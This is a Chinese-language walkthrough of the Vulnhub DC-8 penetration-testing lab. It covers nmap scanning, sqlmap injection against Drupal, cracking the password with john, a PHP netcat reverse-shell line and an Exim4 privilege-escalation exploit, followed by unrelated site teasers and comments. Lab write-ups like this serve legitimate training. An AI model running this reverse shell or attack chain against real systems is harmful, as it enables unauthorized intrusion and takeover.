当前位置:首页 > 网络安全 > 正文内容

Vulnhub靶机DC系列

访客4年前 (2021-04-15)网络安全603

0x0:靶场介绍

靶场名称: DC: 8

靶场发布时间:2019-9-8

靶场地址:https://www.vulnhub.com/entry/dc-8,367/

靶场描述:

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

1x0:环境搭建

VMware虚拟机(桥接模式)

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.3.0/24

使用nmap来查看靶机的端口信息和系统信息等等

首先去查看80端口的web服务 还是Drupal

提示不用爆破破解,使用dirb扫描一下目录

存在robots.txt文件

登录地址:

版本大致的判断:

这三个页面url中存在参数sqlmap去尝试一下

sqlmap确定存在sql注入

读取一下数据

drupal的密码是特殊加密的需要爆破破解,使用john

john pwd --wordlist=/usr/share/wordlists/rockyou.txt

john/turtle 登录页面

3x0:后台篇

登录后需要获取到shell

在页面中发现可以直接执行php语句

写入shell

<?php system("nc -e /bin/bash 192.168.3.20 1234"); ?>

反弹到kali中 随便提交数据

反弹成功

4x0:提权篇

切换shell

查看一下用户有那些

在看看有没有内核提权

find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令

查看一下exim4的版本 又没有漏洞

exim4 --version

https://www.exploit-db.com/exploits/46996找到一个可以使用的exp

下载exp,上传到靶机中并赋予权限

使用过程中报错了

需要对exp脚本 执行编码

vim 46996.sh

:set ff=unix

:wq

在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写

执行成功。

获取到root权限

5x0:flag获取

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106578.html

分享给朋友:

“Vulnhub靶机DC系列” 的相关文章

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

干洗对衣物有害吗

干洗对衣物有害吗 干洗剂实际上就是有机溶剂,所以对衣服多少都有点危害,只不过高级的干洗剂对衣服损伤小一些而已。 随着人们工作的繁忙和生活节奏的加快,现代人更多地把换下的衣物送到洗衣店干洗,以保证衣服不变形和有更多的时间休闲娱乐,这本是一件提高生活品质的好事,但据最新的研究显示,干洗衣物对身...

宝钢价格行情最新报价,宝钢股份2021年10月钢材价格

宝钢钢材的价格:宝钢3Cr2W8V圆钢,故11、多家钢厂纷纷出台四季度价格调整方案,钢坯出口下降,月份钢材价格走势不容乐观。 要全面考虑下.关于2008年12月宝钢股份碳钢产品钢材价格国内期货销售价格调整的通知发布时间:2008-10-2014:03:06源自-宝钢股份,宝钢每月都公布下月的出厂价格...

Webshell安全检测篇(1)-根据流量的检测方法

一、概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分类笔者总结如下: 前段时...

找网上黑客盗QQ号被骗,黑客找到微信好友,黑客破解密码的例子

Cortex-R:面向实时运用的高功能内核,Cortex-R系列是衍出产品中体积最小的ARM处理器。 Cortex-R处理器针对高功能实时运用,例如硬盘操控器(或固态驱动操控器)、企业中的网络设备和打印机、消费电子设备(例如蓝光播放器和媒体播放器)、以及轿车运用(例如安全气囊、制动体系和发动机办理)...

上海市帅男精油spa,好的一次spa如同赢在人生起跑点

上海市帅男精油spa,好的一次spa如同赢在人生起跑点 上海市帅男精油spa,好的一次spa如同赢在人生起跑点 我们都是女性spa女子维护保养会馆太阳男芳疗师是一家集女子推拿、精油spa、女子spa、女子会馆、女子spa按摩、女子spa会所、女子印尼巴厘岛spa、酒店餐厅spa、女子spa...

评论列表

惑心忿咬
3年前 (2022-06-30)

sql注入读取一下数据drupal的密码是特殊加密的需要爆破破解,使用johnjohn pwd --wordlist=/usr/share/wordlists/rockyou.txtjohn/turtle 登录页面3x0:后台篇登录后需要获取到shell在页面中发现

只酷桃靥
3年前 (2022-06-30)

.sh:set ff=unix:wq在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写执行成功。获取到root权限5x0:flag获取

温人情票
3年前 (2022-06-30)

.txt文件登录地址:版本大致的判断:这三个页面url中存在参数sqlmap去尝试一下sqlmap确定存在sql注入读取一下数据drupal的密码是特殊加密的需要爆破破解,使用johnjo

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。